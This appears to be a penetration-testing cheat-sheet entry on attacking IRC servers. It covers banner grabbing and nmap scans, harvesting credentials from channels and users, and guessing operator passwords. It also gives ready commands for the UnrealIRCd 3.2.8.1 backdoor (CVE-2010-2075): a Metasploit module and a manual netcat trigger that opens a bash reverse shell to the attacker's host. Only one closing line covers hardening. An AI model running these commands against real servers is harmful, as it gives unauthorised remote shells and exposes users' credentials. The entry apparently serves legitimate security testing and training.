IRC
aka ircd, unrealircd
Internet Relay Chat on 6667 (and 194/6697). Enumerate channels and users, harvest creds from chat, and watch for the famous UnrealIRCd 3.2.8.1 backdoor that gives instant RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
6667 | tcp | IRC |
6697 | tcp | IRC over TLS |
194 | tcp | IRC (registered) |
Fingerprint
- Banner / MOTD names the ircd and version on connect
- nmap irc-info script returns server stats
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2010-2075 | UnrealIRCd 3.2.8.1 backdoor — unauthenticated RCE |
Exploitation primitives
- Connect and enumerate channels (LIST) and users (WHO) for creds/info
- UnrealIRCd 3.2.8.1 backdoor: send `AB; <cmd>` for RCE (Metasploit unreal_ircd_3281_backdoor)
- Weak/guessable OPER credentials grant server operator control
Overview
IRC on 6667 is a chat server. Two angles: enumerate channels/users (chat leaks creds), and version-check the daemon — UnrealIRCd 3.2.8.1 shipped with a literal backdoor.
Enumeration
Banner / version:
nc -nv <TARGET> 6667nmap info:
nmap -p6667 --script irc-info,irc-unrealircd-backdoor <TARGET>Connect with a client to LIST channels / WHO users:
irssi -c <TARGET> -p 6667UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075)
msf > use exploit/unix/irc/unreal_ircd_3281_backdoorManual trigger:
printf 'AB; bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"\n' | nc <TARGET> 6667Hardening
Patch UnrealIRCd, require strong OPER passwords, and restrict server linking.